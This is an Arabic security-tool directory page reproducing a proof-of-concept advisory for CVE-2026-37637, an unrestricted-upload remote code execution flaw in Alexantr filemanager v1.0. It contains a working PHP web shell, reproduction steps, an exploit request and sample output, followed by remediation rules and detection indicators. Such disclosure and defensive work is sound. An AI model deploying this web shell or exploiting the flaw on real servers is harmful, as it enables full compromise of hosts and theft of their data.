Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-37637 — تنفيذ التعليمات البرمجية عن بُعد في Alexantr filemanager الإصدار 1.0 عبر رفع ملفات غير مقيد | Kitploit
أدوات/GitHubGitHub/slo-cyber-sec/cve-2026-37637
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

تنفيذ التعليمات البرمجية عن بُعد في Alexantr filemanager الإصدار 1.0 عبر رفع ملفات غير مقيد

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-37637

إثبات المفهوم لثغرة CVE-2026-37637 - تنفيذ الأكواد عن بُعد في Alexantr filemanager v1.0 عبر رفع الملفات غير المقيد في filemanager.php.

نظرة عامة

CVE-2026-37637 هي ثغرة تنفيذ أكواد عن بُعد تؤثر على Alexantr filemanager v1.0.

توجد الثغرة في مكوّن filemanager.php بسبب عدم كفاية التحقق من الملفات المرفوعة. يمكن لمهاجم عن بُعد رفع ملف PHP خبيث إلى دليل يمكن الوصول إليه عبر الويب وتنفيذ أوامر عشوائية على الخادم.

حالة CVE: تم إرسالها إلى MITRE
الباحث: CYBER-SEC مستودع البائع: https://github.com/alexantr/filemanager


ملخص الثغرة

العنصرالوصف
معرّف CVECVE-2026-37637
نوع الثغرةتنفيذ الأكواد عن بُعد
المنتج المتأثرAlexantr filemanager
الإصدار المتأثرv1.0
المكوّن المعرّضfilemanager.php
ناقل الهجومعن بُعد
المصادقة المطلوبةتعتمد على النشر/الإعدادات
التأثيرتنفيذ أوامر عشوائية
السبب الجذريرفع ملفات غير مقيد وغياب التحقق من الملفات على جانب الخادم

التأثير

يمكن للمهاجم رفع ملف PHP خبيث من خلال وظيفة رفع الملفات. نظرًا لأن الملفات المرفوعة تُخزَّن في موقع يمكن الوصول إليه عبر الويب ويُسمح بتنفيذ PHP، يمكن للمهاجم تنفيذ أوامر نظام عشوائية على الخادم.

قد يسمح الاستغلال الناجح للمهاجم بـ:

  • تنفيذ أوامر عشوائية على الخادم
  • قراءة ملفات حساسة
  • تعديل أو حذف ملفات التطبيق
  • رفع برمجيات خبيثة إضافية أو قواقع ويب
  • التوسع داخل بيئة الاستضافة
  • اختراق الخادم المتأثر بالكامل

التفاصيل الفنية

يسمح التطبيق للمستخدمين برفع ملفات عشوائية دون التحقق بشكل صحيح من امتداد الملف أو نوع MIME أو محتوى الملف.

يمكن رفع ملف PHP خبيث مثل التالي:

root@kitploit:~
<?php system($_GET['cmd']); ?>

بمجرد رفعه إلى دليل يمكن الوصول إليه عبر الويب، يمكن للمهاجم تنفيذ أوامر من خلال الوصول إلى الملف عبر المتصفح وتمرير الأوامر عبر معامل cmd.

مثال:

root@kitploit:~
http://target/uploads/shell.php?cmd=id

يؤدي هذا إلى تنفيذ أوامر على نظام التشغيل الأساسي.


خطوات إعادة الإنتاج

1. استنساخ التطبيق المعرّض

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. تشغيل خادم تطوير PHP

root@kitploit:~
php -S localhost:8000

3. الوصول إلى التطبيق

افتح التطبيق في المتصفح:

root@kitploit:~
http://localhost:8000/filemanager.php

اعتمادًا على النشر أو الإعدادات، قد يكون التطبيق متاحًا أيضًا عبر:

root@kitploit:~
http://localhost:8000/pheditor.php

4. رفع ملف PHP خبيث

أنشئ ملفًا باسم shell.php:

root@kitploit:~
<?php system($_GET['cmd']); ?>

ارفع الملف باستخدام وظيفة الرفع في التطبيق.

5. تنفيذ أمر

بعد رفع الملف، قم بالوصول إليه مباشرة من المتصفح:

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

إذا نجح الاستغلال، سينفّذ الخادم الأمر ويعيد الناتج.

مثال على الناتج:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

إثبات المفهوم

حمولة PHP الخبيثة

root@kitploit:~
<?php system($_GET['cmd']); ?>

مثال على الطلب

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

النتيجة المتوقعة

يتم تنفيذ الأمر المُمرَّر عبر معامل cmd على الخادم.


السبب الجذري

تحدث الثغرة بسبب عدم كفاية التحقق على جانب الخادم في وظيفة رفع الملفات.

لا يقيد التطبيق بشكل صحيح:

  • امتدادات الملفات
  • أنواع MIME
  • محتوى الملفات
  • وجهة الرفع
  • صلاحيات التنفيذ داخل دليل الرفع

نتيجة لذلك، يمكن رفع ملفات PHP قابلة للتنفيذ وتنفيذها مباشرة.


الإصلاح الموصى به

يجب على البائع والمستخدمين تنفيذ الحمايات التالية.

1. حظر امتدادات الملفات الخطيرة

منع رفع أنواع الملفات القابلة للتنفيذ مثل:

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. استخدام قائمة السماح

السماح فقط بأنواع الملفات المتوقعة، على سبيل المثال:

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. التحقق من نوع MIME ومحتوى الملف

لا تعتمد فقط على ترويسة Content-Type المقدمة من العميل.

يجب إجراء التحقق من الملفات على جانب الخادم.

4. تخزين الملفات المرفوعة خارج جذر الويب

يجب ألا تكون الملفات المرفوعة قابلة للتنفيذ مباشرة أو متاحة للجمهور.

5. تعطيل تنفيذ PHP في أدلة الرفع

بالنسبة لـ Apache، يمكن القيام بذلك باستخدام .htaccess:

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

بالنسبة لـ Nginx، منع معالجة PHP في مسارات الرفع:

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. إعادة تسمية الملفات المرفوعة

استخدم أسماء ملفات عشوائية مولّدة من الخادم وأزل الامتدادات التي يتحكم بها المستخدم.

7. تطبيق التحكم المناسب في الوصول

اقتصر وظيفة الرفع على المستخدمين الموثوقين فقط.


الاكتشاف

يمكن للمسؤولين البحث عن ملفات PHP مرفوعة مشبوهة في الأدلة المتاحة عبر الويب.

مؤشرات مثال:

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
.php files inside upload directories

قد تتضمن أنماط الطلبات المشبوهة:

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

مثال على سجل:

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

إخلاء المسؤولية

تم توفير هذا المستودع لأغراض تعليمية وأمنية دفاعية فقط.

تهدف المعلومات وإثبات المفهوم إلى مساعدة المطورين ومسؤولي الأنظمة ومتخصصي الأمن على فهم الثغرة ومعالجتها.

لا تستخدم هذه المعلومات لمهاجمة الأنظمة دون إذن صريح. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

المؤلف غير مسؤول عن أي إساءة استخدام للمعلومات الواردة في هذا المستودع.


المراجع

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
تنزيل الأداة